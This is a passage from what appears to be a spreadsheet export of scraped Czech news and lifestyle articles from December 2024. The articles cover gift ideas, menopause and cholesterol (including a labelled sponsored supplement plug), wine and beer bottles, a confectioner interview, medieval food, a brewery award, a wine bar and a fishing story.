ložním prádlem nebo například Vámi ručně malovaným hrnečkem. Určitě žádná babička nepohrdne ani kvalitní kosmetikou. Co dát dědovi Dědečkové se mohou zdát nároční, ale vlastně jim udělají radost podobné věci jako tátovi. Tudíž můžete vsadit na půllitr nebo nějaké to nářadí. Dědovi můžete udělat radost i teplými ponožkami či papučemi a nějakou fešáckou dekou. Dalším perfektním dárkem může být také kapesní nůž nebo houbařský nůž, třeba s gravírovaným věnováním. Nenechte si ujít: Spolkl vám bankomat kartu? Takto musíte postupovat Pro bráchu Bráchovi můžete koupit například hru na konzoli či počítač, která mu udělá radost. Potěšit může i desková hra a lego. Radost mohou udělat i doplňky jako sluneční brýle, kožený pásek nebo peněženka. Stoprocentně můžete bráchu potěšit bezdrátovými sluchátky. A určitě neuděláte krok vedle s dárkovou kartičkou ať už na jídlo, oblečení nebo do nějakého herního obchodu. Přeci jen si od určitých let dárky vybereme občas raději sami… Pro ségru V jednom ohledu bych řekla, že nakupovat dárky pro sestru je o dost jednodušší než pro bratra. Ségru rozhodně můžete potěšit jakoukoliv kosmetikou, ať už dekorativní nebo skin care. Neurazí ani vlasová kosmetika od různých olejů, přes laky na vlasy až po suché šampóny. K těmto kosmetickým věcem můžete přihodit například nějaký kvalitní hřeben či masážní kartáč pro stimulaci vlasové pokožky. Ani sestra nepohrdne teplou dekou, příjemným pyžamem nebo také hezkým hrnečkem. Nenechte si ujít: Rodiče a prarodiče jistě potěší i fotokniha, se kterou nešlápnete vedle a co je víc než krásné vzpomínky… Navíc tento dárek bude patřit k těm finančně méně náročným a potěší nejvíce. Jak neutratit ani korunu Tip: Pokud nechcete za vánoční dárky utrácet obrovské částky, či vlastně vůbec utrácet, zkuste vyrobit něco doma, nebo podarovat Vámi věnovanou poukázku. Můžete jich vyrobit několik, například pro mamku „pomoc s úklidem“, „pohlídám mladšího sourozence“, „poukaz na masáž“ a další… Zdroj: Autor Autor: Veronika Hyková Autor person Veronika Hyková Rubrika transition_slide Co se právě děje</t>
  </si>
  <si>
    <t>469</t>
  </si>
  <si>
    <t>148.44</t>
  </si>
  <si>
    <t>20241201_191_3475721524_f8e4c0833428cfeffcee.html</t>
  </si>
  <si>
    <t>f8e4c0833428cfeffcee</t>
  </si>
  <si>
    <t>Menopauza a vysoký cholesterol. Proč je důležité ho nepodceňovat</t>
  </si>
  <si>
    <t>Menopauza a vysoký cholesterol. Proč je důležité ho nepodceňovat 1. 12. 2024 Hormonální změny během menopauzy mají zásadní vliv na hladinu cholesterolu v ženském organismu. Vysoký cholesterol však sami neodhalíte, protože není vidět, ani nebolí. Představuje ale vážná zdravotní rizika, kterým je důležité předejít. Jaké kroky mohou ženy podniknout a proč je prevence v tomto období zásadní? Vysoká hladina cholesterolu je vážný problém, který není radno podceňovat! Vede k ucpávání cév, které může být příčinou infarktu nebo mrtvice. Zvlášť pro starší ženy představuje jedno z největších nebezpečí, i přesto o něm ale většina žen neví téměř nic. „Cholesterol je látka tukové povahy, kterou si naše tělo z části vyrobí samo v játrech, a z části ho přijímáme v potravě. Vysoké množství obsahuje například červené maso, tučné sýry, máslo nebo sádlo,“ uvádí David Buchta, propagátor zdravého životního stylu a zástupce značky FEMINUS, www.feminus.cz. Jakou odvádí cholesterol práci v našem těle? Najdeme ho ve všech buňkách, je základní stavební jednotkou všech nervů i mozkových buněk, hraje důležitou roli při tvorbě žlučových kyselin a je nutný pro tvorbu hormonů. Průměrná koncentrace cholesterolu v krvi se u Evropanů pohybuje mezi 4,5 – 6,2 mmol/l u mužů a u žen mezi 4,6 – 6,1 mmol/l. Doporučená hodnota je ovšem pod 5,16 mmol/l, u osob s kardiovaskulárními obtížemi by měla být ještě nižší. Pokud hodnota přesáhne 6,18 mmol/l, je považována za vysokou. Špatný a dobrý cholesterol Hladina cholesterolu se zjišťuje z krve a je možné stanovit tři hodnoty – celkový cholesterol, HDL a LDL. HDL je označován jako „dobrý“, zatímco LDL je „špatný“. Dobrý HDL odvádí nadbytečný cholesterol zpět do jater, kde je metabolizován. Díky tomu, že tělu pomáhá zbavovat se přebytečného cholesterolu, je pro organismus nepostradatelný. LDL je považován za špatný, protože se usazuje v cévních stěnách. Ty pak ztrácejí pružnost, zužují se a může dojít i k jejich ucpání. Důsledek může být fatální. Orgán, který céva vyživuje, odumírá. „Je tedy důležité, aby organismus dokázal udržet v krvi a trávícím systému zdravý poměr dobrého a zlého cholesterolu,“ říká David Buchta, propagátor zdravého životního stylu a zástupce značky FEMINUS, www.feminus.cz. Cholesterol jako zabiják Vysoká hladina cholesterolu s sebou přináší řadu zdravotních rizik. Lidé však velmi dlouho nemusí vůbec tušit, že něco není v pořádku. Příznaky většinou pocítí až tehdy, když dojde k rozvoji aterosklerózy a je omezena průchodnost tepny. Dojít pak může k infarktu, mrtvici i dalším vážným onemocněním oběhové soustavy. Zvýšené hodnoty cholesterolu mají lidé, kteří holdují potravinám bohatým na živočišné tuky, trpí nadváhou nebo obezitou. Hladiny cholesterolu zvyšuje také kouření, nadměrná konzumace alkoholu a nedostatek pohybu. Vyšší hladinu můžete získat ale také dědičně – a pozor, nemusí se to vůbec projevit nadváhou! V nebezpečí jsou také lidé trpící cukrovkou a ženy po padesátce. Cholesterol v menopauze Spolu s věkem se obecně zvyšuje i hladina cholesterolu, to platí stejně pro muže i ženy. U žen jsou ale tyto změny obzvlášť významné v období menopauzy. Vytváří se čím dál tím méně ženského hormonu estrogenu, což způsobuje, že hladina LDL, tedy toho „špatného“ cholesterolu, stoupá a hladina „dobrého“ HDL klesá. Není tak výjimkou, že ženy, které s cholesterolem nikdy problém neměly, jeho vysoké hodnoty překvapí. To je ovšem ten lepší případ, u zhruba poloviny případů srdečně-cévních onemocnění u žen udeří nemoc velice náhle a intenzivně. Obecně se srdečně-cévní onemocnění začínají u žen objevovat po 55. roce života. Jedná se především o srdeční infarkty a mozkové mrtvice. Přibývání na váze v období menopauzy? V období menopauzy dochází ke zpomalování metabolismu a přibírání na váze. Navíc měnící se hladiny hormonů způsobují, že se tuk ukládá více v oblasti břicha. Takové rozložení tuku je ale pro naše zdraví méně příznivé a souvisí i s vysokou hladinou cholesterolu. Vysoký cholesterol u žen navíc může souviset se změnou jídelníčku. V důsledku hormonálních výkyvů se totiž mění i naše chutě, a to bohužel k horšímu. Málokterá žena si to dokáže uvědomit a má pocit, že se v jejích stravovacích návycích nic nezměnilo. Jak předejít vysokému cholesterolu? Základem je zdravý životní styl, vyvážená strava a dostatek pohybu. Špatný cholesterol zvyšuje strava bohatá na nasycené mastné tuky, mezi které patří sádlo, masné výrobky, máslo, tučné sýry, různé sušenky, ale také kokosový a palmový olej. Mírně může cholesterol zvedat i nadměrná konzumace vajec, jater a ledvinek. Existují ale také potraviny, které pomáhají hladinu špatného cholesterolu snižovat. „Patří mezi ně mandle, lněná semínka, jablka, sója nebo třeba olivový olej. Odborníci doporučují změnit stravu ze smažené na vařenou a hojně si dopřávat nejrůznější zeleninu a jídla s vysokým obsahem vlákniny,“ David Buchta, propagátor zdravého životního stylu a zástupce značky FEMINUS, www.feminus.cz. Závěr: Lidé se dožívají stále vyššího věku, a tak ženy stráví podstatnou část svého života v období po menopauze. I proto je velice důležité vědět o tom, jak hormony ovlivňují hladinu cholesterolu a pravidelně ji u lékaře kontrolovat. Problémy s vyšší hladinou cholesterolu trpí až tři čtvrtiny populace v Česku! A to rozhodně není málo! Dejte si na něj pozor i vy! Dodržujte správnou životosprávu Samozřejmě důležitá je i správná životospráva. Pokud trpíte únavou či vám chybí energie vyzkoušejte například léčivé účinky kotvičníku zemního. Kotvičník zemní je bylinkou oblíbenou ženami i muži. Obsahuje látky, které tělu pomáhají regulovat hormonální nerovnováhu, a dokáže nás nabudit. Podporuje imunitu i dobrou psychickou kondici, zvyšuje libido, dodává tělu energii, snižuje krevní tlak i cholesterol. „Pole jeho působení je opravdu široké. Je doporučován ženám, které trápí únava, nespavost, přibírání na váze, deprese, snížený zájem o sex, osteoporóza, nepravidelná menstruace, ztráta vlasů, úzkost i neschopnost dosáhnout orgasmu,“ vyjmenovává David Buchta, propagátor zdravého životního stylu a zástupce značky FEMINUS, www.feminus.cz. Kotvičník naleznete například v doplňku stravy značky FEMINUS, www.feminus.cz, kde je obsažen vysoce kvalitní práškový extrakt z již zmiňované rostliny. TIP: Doplněk stravy Feminus Doplněk stravy pro ženy. Díky přírodnímu složení se zaměřuje na posílení imunitního systému a udržení dobrého sexuálního zdraví. Přispívá také ke správnému posílení imunitního systému, močové soustavy, reprodukčního systému a k hormonální rovnováze. Snižuje míru únavy a vyčerpání. Jedná se o přírodní produkt obsahující ověřené látky pro optimalizaci ženského hormonu estrogen. Zakoupit jej lze na e-shopu za cenu 569 Kč za balení na jeden měsíc. Viz odkaz: www.feminus.cz. Autor: Autor: | Komerční sdělení | Vstoupit do diskuze | 0 || Komerční sdělení || i60.cz</t>
  </si>
  <si>
    <t>10380</t>
  </si>
  <si>
    <t>28460</t>
  </si>
  <si>
    <t>20241201_192_3475815265_0c0f7d0118f37256dd89.html</t>
  </si>
  <si>
    <t>0c0f7d0118f37256dd89</t>
  </si>
  <si>
    <t>Tajemství láhví: Proč je pivo v hnědém, či zeleném skle a víno má objem 0,75 litru?</t>
  </si>
  <si>
    <t>Tajemství láhví: Proč je pivo v hnědém, či zeleném skle a víno má objem 0,75 litru? Proč jsou pivní láhve nejčastěji z hnědého nebo zeleného skla? Proč víno tradičně nalezneme v láhvi o objemu přesně 0,75 litru? A jakou roli hraje design a funkčnost u nápojových obalů? Odpovědi vás možná překvapí! Proč jsou pivní láhve hnědé a zelené? Pivní láhve nejsou hnědé nebo zelené jen z estetických důvodů. Primárně jde o ochranu samotného nápoje. Pivo obsahuje látky citlivé na světlo, zejména na UV záření. Pokud jsou vystaveny příliš velkému množství světla, může dojít k chemické reakci, která změní chuť piva na nepříjemnou. Tento jev je známý jako „skunked beer“. Hnědé sklo je nejúčinnější v blokování UV záření, zatímco zelené sklo je o něco méně efektivní. Zelená barva se však stala populární v době, kdy bylo hnědé sklo kvůli nedostatku materiálů méně dostupné (v období 2. světové války), a brzy se spojila s prestiží některých pivních značek. Proč mají láhve vína objem 0,75 litru? Objem 0,75 litru u vín má své kořeny v historii. Tento standard vznikl v Evropě , kde bylo nutné sladit velikost láhví s přepravou a obchodními zvyklostmi. Objem 0,75 litru byl praktický z několika důvodů: Fyzická kapacita sklářů: Ruční výroba láhví byla limitována plicním objemem foukače skla. Průměrný foukač dokázal vytvořit právě tak velkou láhev. Obchodní standard: Objem 0,75 litru odpovídal ideálnímu množství na jednu degustační porci pro šest osob, což bylo běžné při ochutnávkách. Přizpůsobení přepravě: Objem byl snadno slučitelný s imperiálními jednotkami, které tehdy dominovaly v mezinárodním obchodu. Jeden galon obsahoval přesně pět láhví o objemu 0,75 litru. Jak je to s šumivými víny a jejich silnějšími láhvemi? Šumivá vína , jako je šampaňské, potřebují láhve s tlustšími stěnami. Důvodem je tlak, který se uvnitř láhve vytváří při procesu sekundárního kvašení. Tlak v láhvi šampaňského může dosahovat až 6 atmosfér, což odpovídá tlaku v pneumatikách nákladního auta. Silnější sklo zabraňuje prasknutí láhve, zatímco tvar dna s charakteristickým „důlkem“ přispívá k rovnoměrnému rozložení tlaku. Proč mají minerální vody tradičně průhledné nebo světle zbarvené láhve? Láhve na minerální vody jsou obvykle průhledné nebo lehce modré či zelené. Tento designový prvek zdůrazňuje čistotu a svěžest vody. Na rozdíl od piva minerální voda neobsahuje látky citlivé na světlo, takže nepotřebuje ochranu před UV zářením. Při výběru barvy však hraje roli marketing. Světle zbarvené láhve podporují dojem přirozenosti a zdravotní prospěšnosti, což je atraktivní pro zákazníky v segmentu minerálních vod. Co znamenají různé tvary a velikosti láhví? Tvar láhve má nejen estetickou, ale také praktickou funkci. Například: Bordeaux : Vysoká láhev s rovnými stranami a výraznými rameny je vhodná pro červená vína s těžším tělem, která potřebují delší zrání. Burgundsko : Široká základna a jemné křivky jsou ideální pro vína s nižším obsahem taninů, jako je Pinot Noir. Flétna: Tenké, vysoké láhve se často používají pro vína s vyšší kyselinkou, jako jsou Rieslingy. Jakou budoucnost mají nápojové láhve? Moderní technologie a ekologické požadavky mění svět nápojových láhví. Stále častěji se používají recyklované materiály a objevují se inovativní návrhy, jako jsou kompostovatelné obaly nebo znovuplnitelné láhve. Navíc digitální etikety umožňují výrobcům sdělovat zákazníkům informace interaktivním způsobem – například prostřednictvím QR kódů. Design i funkčnost láhví tak stále více směřují k udržitelnosti a technologiím. Líbil se vám článek? Řekněte o něm přátelům: Štěstí je pocitová emoce, naše niterní záležitost, produkt mysli – musíme se s ním naučit pracovat tak, aby se O Autorovi redakce Redakce pro vás připravuje nové zajímavé rady, jak řešit různé záležitosti. Pokud máte zajímavý návod, který byste chtěli zveřejnit, můžete nás kontaktovat. Stejně tak v případě zájmu o inzerci. Autor: redakce Rubrika transition_slide Zajímavosti</t>
  </si>
  <si>
    <t>57</t>
  </si>
  <si>
    <t>20241201_193_3475698428_487a1a7ba5aa073f9382.html</t>
  </si>
  <si>
    <t>487a1a7ba5aa073f9382</t>
  </si>
  <si>
    <t>Punčák moc rád nemám, směje se cukrář Vojtěch Vrtiška</t>
  </si>
  <si>
    <t>Punčák moc rád nemám, směje se cukrář Vojtěch Vrtiška „Cukrařina je pro mě pocitem štěstí v nešťastné době, možností nekonečné seberealizace, ventil od náročného studia medicíny. Je to vášeň, posedlost a láska.“ To píše na svých webových stránkách dnešní host Vojtěch Vrtiška. Vojtěch se narodil v Táboře a tam taky vystudoval gymnázium. Teď je studentem čtvrtého ročníku medicíny a má individuální studijní plán. První řadu Peče celá země jste sledoval jako divák, do druhé jste se přihlásil sám, stal jste se náhradníkem, ale nakonec jste se musel víc učit, tedy dal jste přednost maturitě a přijímačkám na medicínu. Do třetí řady jste nechtěl, ale nechal jste se umluvit. Co vás přesvědčilo? No, mě ve finále nikdo nepřesvědčoval, protože si pamatuju, že tehdy mi volal pan dramaturg a ptal jsem mě, proč se nechci účastnit Peče celá země. Já jsem mu říkal, že je to pro mě obrovský risk, a to z jedné strany tím, že jdu přece jenom se svojí kůží na trh, tak z druhé strany tím, že studuji medicínu a že mi hrozí, že bych ji taky nemusel dostudovat. A on mi řekl tehdy, že dobře, ať přijdu aspoň na kafe na Kavčí hory si o tom popovídat. A když jsem s tím souhlasil, tak týden na to se mě ptali s tím, že na ten casting půjdu, co upeču. Takže mě se vlastně nikdo neptal. Srdeční záležitost? Malinové lívance mojí prababičky. Co společného by měl mít lékař a cukrář? To je těžké říct. Myslím, že pro mě je cukrařina oproti medicíně opravdu takový protipól. Takže medicína je ta rigidní, cukrařina je pro mě ta kreativní část. Mezi tím si tak jako pobíhám, dokud si nebudu muset úplně vybrat. Trpělivost patří do obou oborů. Myslím si, že občas i empatie, protože oba dva ty obory pracují s city. Každý trochu jinak, ale je to tam. Někde jste uvedl, že pečete to, co byste si sám přál někdy ochutnat v českých cukrárnách. Co je pro vás teď právě top? Rád se vracím k retro cukrařině, protože to je vždycky, myslím si, takový vývoj, že si uděláte kolečko, pak zjistíte, že ta klasika a ta nostalgie je začleněná přesně v té špičce, v tom větrníku. Když si chci opravdu užít něco fajn, tak stejně skončím většinou u české cukrařiny. Vojtěch Vrtiška | foto: Jana Volková Já mám tu tradici uvnitř punčového dortu. Změnilo se na něm něco za poslední dobu? Tradiční punčák a vy? Zrovna punčák je jeden z dezertů, který zažívá menší revoluci a trošku se tam namířil zrak českých cukrářů, ochucuje se různými šťávami, pyré, různými alkoholy , takže už to vůbec nebývá ten klasický punčák s rumovou trestí, ale taky občas je. Myslím si, že kvalita se hodně zvedla, i když já ho stejně moc rád nemám.. Když jste zvítězil v soutěži Peče celá země, jaká byla první slova vaší maminky? Moje maminka má stále trošku strach. Je to dané tím, že já jsem do Peče celá země šel, abych si ověřil, že jsem udělal s medicínou dobře. Ono to tak nějak nedopadlo a stále jsem úspěšně rozkročený. Samozřejmě moje maminka ví, co jsem obětoval jak té cukrařině, tak i té medicíně. Je to pro ni těžké, protože si přeje, abych byl šťastný. Co je vaší srdcovou záležitostí? Když bych se vrátil k receptům, tak pořád je moje srdcová záležitost recepty mojí babičky, mojí prababičky. Vždycky se mě ptají novináři, co je můj nejoblíbenější recept. Což je věc, na kterou já nerad odpovídám, protože nemám rád superlativy, ale pokaždé si vzpomenu na malinové lívance od mojí prababičky. Tak to je asi srdcová záležitost. Na závěr otázka od umělé inteligence. Jsou tu dvě, tak je položíme obě. Jaký je váš nejoblíbenější nástroj v kuchyni? Já mám rád svého robota, protože od chvíle, kdy mi sedí v kuchyni, a už je to nějaký rok, tak mi strašně ulehčuje přípravu těst, především toho kynutého, které mám rád. A to, že čtvrt hodiny hněte za vás a přežije to, je prostě úžasná věc a tomu těstu to neskutečně pomůže. Ještě druhá otázka od umělé inteligence. Který váš výtvor z pořadu Peče celá země se vám líbil nejvíc? To je těžké. Já všechny své výtvory beru trochu jako své děti. Tím, že jsem do nich investoval spoustu času a energie, asi těžko se mi vybírá jeden. Tak to doplním a obrátím. Do kterého jste investoval nejvíc? No, to byl určitě medvídek. Já jsem se do té doby vyhýbal a teď už zase vyhýbám dětským dortům. Nemám rád dorty, které mají vypadat jako něco, nějaký předmět přesně nebo nějaká postavička, protože to se trošku míjí s mojí představou o tom, že vizuál by měl podpořit chuť. Takže když jsem se dozvěděl, že budu péct medvěda, tak se mi udělalo špatně a přemýšlel jsem v jednou chvíli, jestli vůbec podepíšu smlouvu o účasti v Peče celá země. O to větší paradox je ten, že se medvěd upekl a ještě jsem ten daný díl vyhrál, což doteď úplně nechápu. Tam ta energie byla asi největší. Proč by měl být dezert i zážitkem? Proč si Vojtěch fotil obrázky do své kuchařky sám? Kdo věděl o tom, že vyhrál Peče celá země, než se to z televizních obrazovek dozvěděla po tři čtvrtě roce celá země? Autor: Alena Zárybnická Autor Alena Zárybnická Rubrika transition_slide Zálety Aleny Zárybnické</t>
  </si>
  <si>
    <t>4510</t>
  </si>
  <si>
    <t>5850</t>
  </si>
  <si>
    <t>20241201_194_3475700278_86e3e117ef0ce096df97.html</t>
  </si>
  <si>
    <t>86e3e117ef0ce096df97</t>
  </si>
  <si>
    <t>Toto jedli Češi ve středověku. Nepozřeli byste to!</t>
  </si>
  <si>
    <t>Toto jedli Češi ve středověku. Nepozřeli byste to! close 4 fotografie Každý z nás se rád dobře nají a tento přístup není žádná moderní novinka. Lidé rádi zkoušeli nové chutě a dopřávali si vzácné lahůdky, někdy i jenom proto, aby ukázali svoje bohatství a status. V tom se lidé ve středověku nijak nelišili od nás dnes. Středověký jídelníček Co si rozhodně středověcí obyvatelé české kotliny dopřát nemohli, bylo třeba kakao, tabák, buráky, ale ani brambory. V té době ještě nebyla objevena Amerika , aby takové zboží mohlo putovat do Evropy . Ale není pochyb, že už tenkrát byli naši předkové v kuchyni dostatečně vynalézaví. Mezi roky 1 300 a 1 400 bylo pochopitelně populární maso, nejčastěji hovězí, postupně se přidávalo vepřové, jehněčí, kozí a drůbež. Příležitostně se jedly například veverky, nebo bobři. Mléčné výrobky a vajíčka tvořila jídlo často připravované o postních dnech, vlastně náhražku masa. Co ještě najdeme na středověkém stole Obiloviny byly extrémně důležité a tvořily základ středověké potravy. Obilí se drtilo nahrubo či najemno a připravovaly se z něj chleby, placky nebo kaše. Dobře našim předkům sloužily kroupy, krupky, krupice a mouka. K těm se přidávaly luštěniny, využívané jako hlavní jídlo. V Čechách byl velmi rozšířený hrách, zatímco třeba Italové jedli hlavně cizrnu. Magdalena Beranová , autorka knihy Jídlo v pravěku a ve středověku, nabízí následující hrachový recept, přibližně z 15. až 16. století: „Propasíruj uvařený hrách a zpracuj kaši s cukrem. Přidej rozinky. Potom si umyj čistě ruce a vytvářej malé kuličky jako hrachová zrna, vpresuj je do formiček a potom je usmaž v horkém sádle. Smažené obaluj v cukru, dávej ještě horké na mísu, a ještě posyp cukrem.“ Zdalipak znali zdravé saláty? Salátové rostliny byly také populární, patřily mezi ně například kopřivy, lebeda, kozlíček, polníček, řeřicha či pampelišky. Na špatné zažívání se jedly kořeny pampelišek, říkalo se jim lví zub. Nesmrtelným pamlskem byl šťovík, který děti v lese uzobávají dodnes. Lidé na našem území už tenkrát znali hlávkový salát nebo lociku či řepu. Ovšem pozor, zpočátku se jedly u řepy listy a někdy se nakládaly. Kořen začal být k jídlu zajímavý až na konci středověku. Z celeru se podávaly také hlavně listy, podobně na tom byla petržel. Mrkev byla ale využívána jako kořenová zelenina poměrně brzy, někdy se jí říkalo žlutá řepa. Nejčastější zeleninou ovšem bylo zelí, jehož pěstování navazovalo na starořímskou tradici. Slovo „kapusta“ je ve slovanských jazycích doloženo už ve velmi dávných dobách, někdy označovalo jak kapustu, tak právě zelí. „Hlávky se pařily bez přísad i bez octa nebo bez vína , a tak se vozily na trh,“ říká Magdalena Beranová . Zelí jedli bohatí i chudí, židé i křesťané. „Patřilo i k takzvané hubené studentské stravě,“ dodává odbornice. Jedlo se vařené, smažené, panstvu se dokonce podávalo pocukrované. Zkuste si schválně takovou pochoutku představit.</t>
  </si>
  <si>
    <t>353850</t>
  </si>
  <si>
    <t>20241201_195_3475684177_49bc4a2e9dd16daf9f65.html</t>
  </si>
  <si>
    <t>49bc4a2e9dd16daf9f65</t>
  </si>
  <si>
    <t>Pivovarem roku se letos stal humpolecký Bernard, který získal čtyři další ocenění pro svá piva</t>
  </si>
  <si>
    <t>Pivovarem roku se letos stal humpolecký Bernard, který získal čtyři další ocenění pro svá piva Rodinný pivovar Bernard se stal pivovarem roku 2024. Titul získal od Sdružení přátel piva v soutěži vyhlašované pravidelně již od roku 1990. Pivovar také získal čtyři ocenění pro svá piva , z toho dvě první místa. Soutěž Pivovar roku, kterou pořádá Sdružení přátel piva , je jednou z nejstarších a nejprestižnějších u nás. Vyhlašování výsledků soutěže Pivovar roku probíhá každý rok v jiném regionu, tentokrát sdružení předávalo svoje ocenění v pivovaru Zlatá kráva v Nepomuku . Pivovar Bernard si vysloužil prvenství již několikrát , což je pro jeho sládky závazek i motivace vařit nadále co nejlepší pivo a dál rozvíjet pivovar. Zástupci Rodinného pivovaru Bernard z Humpolce si došli i pro další ocenění. Kategorii světlých výčepních piv vyhrál Bernard Desítka , v kategorii světlých ležáků je nejlepší Sváteční ležák Bernard , třetí je Bernard Dvanáctka . Na druhém místě mezi tmavými pivy je Černý ležák Bernard . Jedničkou ve světovém žebříčku se Černý ležák stal před nedávnem ve své kategorii, když obsadil první místo na prestižní světové soutěži World Beer Awards v Londýně . Soutěž Sdružení přátel piva je jedinou a nejstarší celorepublikovou pivní soutěží samotných spotřebitelů. Systém hodnocení kombinuje anketní a degustační část , kdy piva s nejvyšším počtem získaných hlasů v anketě postupují do anonymní odborné degustace, ze které vyjde konečné pořadí na prvních místech. Získání titulu Pivovar roku 2024 od Sdružení přátel piva představuje pro Rodinný pivovar Bernard jak závazek, tak motivaci nadále vařit co nejlepší pivo a dále rozvíjet pivovar. Vyhlášení výsledků soutěže Pivovar roku pro rok 2024 probíhalo v pivovaru Zlatá kráva v Nepomuku . V soutěži se kombinuje anketní a degustační část, kde piva s nejvyšším počtem získaných hlasů v anketě postupují do anonymní odborné degustace, která určuje konečné pořadí na prvních místech. Bernard Desítka vyhrál v kategorii světlých výčepních piv , Sváteční ležák Bernard byl nejlepší ve světlých ležácích a Bernard Dvanáctka byl třetí. Černý ležák Bernard se umístil druhý mezi tmavými pivy . Černý ležák Bernard nedávno získal první místo v jeho kategorii na prestižní světové soutěži World Beer Awards v Londýně . Soutěž Pivovar roku se vyhlašuje každý rok a tento formát se dodržuje již od roku 1990. Návštěvníci se mohou seznámit s ingrediencemi použitými při výrobě piva , ochutnat slad, dozvědět se o použití skořápek pravěkých řas rozsivek a mnoho dalšího přímo v opravdovém provozu pivovaru.</t>
  </si>
  <si>
    <t>74690</t>
  </si>
  <si>
    <t>20241201_196_3476019004_db06a1ea9ff103f2e050.html</t>
  </si>
  <si>
    <t>db06a1ea9ff103f2e050</t>
  </si>
  <si>
    <t>Vínograf v novém. Se stálým i degustačním menu</t>
  </si>
  <si>
    <t>Vínograf v novém. Se stálým i degustačním menu Podnik byl vždy ideálním místem na skleničku či rovnou lahev vína . Na tom se s novým konceptem nic nemění. Změny se ale dočkala místní kuchyně. Reklama Do vinných barů Vinograf jsem kdysi chodil hlavně na skleničku vína , ale dnes je z podniku na Senovážném náměstí spíše restaurace s širokým výběrem vín . 19 fotografií v galerii Větší kuchyň Vinograf od loňského roku prošel manažerskou i vlastnickou obměnou a k tomu se sluší přidat nový koncept. Bohužel, Vinografu zbyla jen jedna provozovna – ta na Senovážném náměstí . Filiálky na Andělu, Malé Straně nebo Vinohradech vzal čas. Pozitivem je fakt, že se mohou soustředit na jedno místo. Vinograf byl vždy ideálním místem na skleničku či rovnou lahev vína . S novým konceptem se na tom nic nemění. Za skladbou nového vinného lístku, který nabízí na 400 vín, stojí zkušený someliér a dovozce vín Tomáš Melich ze společnosti Vinit.cz. Reklama Největší změny se ale dočkala místní kuchyně. Právě v párování jídla a vína zde vidí velký potenciál. Při několika posledních návštěvách jsem se mohl přesvědčit, že pánové zdejší kuchyně, kreativní šéfkuchař Radek David a jeho pravá ruka šéfkuchař Andrej Mišutka, odvedli s novým „jídelákem“ velký kus práce. Za ochutnání stojí hummus, tatarák, mořský vlk nebo dančí hřbet. Velká vína po skleničce Díky systému Coravin , který přes jehlu umožňuje nalévat víno bez vytažení korku, může Vinograf nabídnout i velmi drahá víno po skleničce . Nabídku vín přes Coravin mohou prý ovlivnit i samotní hosteé. Manažer Michal Štangler říká, že pro hosta klidně otevřenou přes Coravin víno na přání a následně ho zařadí do nabídky vín po skleničce. Aktuální nabídka je vypsaná na tabuli. Degustační večery Vinograf nyní nabízí tematické degustační večery. Ty se zaměřují na vybraná vinařství, jejichž vína Na jednom takovém, s italským vinařstvím Mazzei, jsem minulý týden sám byl. Šéf vinařství Giovanni Mazzei představoval vína Ipsus. Ročníky 2016, 2018, 2019 a 2020 byly doprovázeny hovězím tatarákem, ravioli plněné divočákem, mořským vlkem a srnčím hřbetem. Že šlo o exkluzivní záležitost dokládá i fakt, že víno Ipsus se v maloobchodě prodává za deset tisíc korun za lahev. V degustačních večerech tu prý hodlají pokračovat. Jeden z nejbližších by měl patřit degustacím z exkluzivních sklenic značky Moser . Autor: Zdeněk Pečený Autor Zdeněk Pečený</t>
  </si>
  <si>
    <t>41930</t>
  </si>
  <si>
    <t>44870</t>
  </si>
  <si>
    <t>20241201_197_3475690888_e7141bc1fe09f77abede.html</t>
  </si>
  <si>
    <t>e7141bc1fe09f77abede</t>
  </si>
  <si>
    <t>Jak jsem místo trofeje přinesl domů plechovku – Rybářské příběhy</t>
  </si>
  <si>
    <t>Jak jsem místo trofeje přinesl domů plechovku – Rybářské příběhy Tweet na Twitteru Jak jsem místo trofeje přinesl domů plechovku V druhý den července jsem se jako každý rok vydal na rybaření na řeku Berounku . Vzduch voněl po dešti a sluníčko se snažilo probít skrz mraky. Měl jsem v plánu zdolat nějakou hezkou rybu a přivést domů trofejní úlovek. Co jsem ale nevěděl, bylo to, že tentokrát mě čeká zcela neobvyklý zážitek. Po několika hodinách trpělivého čekání a házení nástrahy jsem najednou ucítil silný záběr. Ryba se snažila utéct, ale já jsem se jí nepřestal držet. Po chvíli souboje jsem konečně přitáhl rybu k břehu. Když jsem ji vytáhl ven, zpozoroval jsem, že to není obyčejný úlovek. Byla to plechovka piva , která se zachytila za háček! Byl jsem zmatený a zarazil jsem se. Plechovka mi vesele zářila v ranním slunci a já jsem si uvědomil, že tentokrát jsem sice nepřinesl domů žádnou rybu, ale mám aspoň zajímavý příběh k vyprávění. Usmál jsem se na tuto náhodnou trofej a rozhodl jsem se, že si z ní udělám památku. Připevnil jsem ji k mému rybářskému batohu a pokračoval jsem v hledání skutečného rybářského pokladu. Celý den jsem strávil u vody, sledoval jsem ptáky, kteří si hráli ve vzduchu, a poslouchal jsem zvuky přírody. Moje myšlenky se ale stále vracely ke plechovce, která mi dala takový nečekaný zážitek. Když jsem se večer vrátil domů, nebyl můj úlovek žádnou rybou, ale plechovka piva , která mi připomínala tento neobvyklý den. Moje rodina se smála, když jsem jí vyprávěl o tom, jak jsem místo trofeje přinesl domů plechovku. Ale já si uvědomil, že i takový úlovek má své kouzlo. Od té doby se plechovka stala mému šťastným průvodcem na každém rybaření. Každý úlovek jsme spolu oslavili a já ji kdysi schoval do svého sbírky rybářských památek. Takové příběhy se jen tak nevidí a zážitky jako tento jsou to, co rybaření dělá tak zajímavým a nezapomenutelným. Takže neváhejte, vydávejte se na vodu, ať už s rybou nebo s plechovkou, a užívejte si přírody a všeho, co vám rybaření může nabídnout. Čelovky a svítilny pro rybáře: Petr Rabářem jsem od 7 let a budu jim navždy. „V každém muži je skryta ctižádost - přechytračit ryby a ženy.“ Pocházím z Anglie , ale už osm let žiju tady v Česku. Mé články nejsou psány perfektní češtinou, ale snad obsah nahradí formu. Autor: Petr || | | Petr | - Rubrika transition_slide Přečtěte si</t>
  </si>
  <si>
    <t>522</t>
  </si>
  <si>
    <t>410</t>
  </si>
  <si>
    <t>20241201_198_3482243096_2a239bc2383ac4f81e70.html</t>
  </si>
  <si>
    <t>2a239bc2383ac4f81e70</t>
  </si>
  <si>
    <t>Michal Suchánek své dceři Berenice herectví rozmlouval, ale dnes ji v něm plně podporuje</t>
  </si>
  <si>
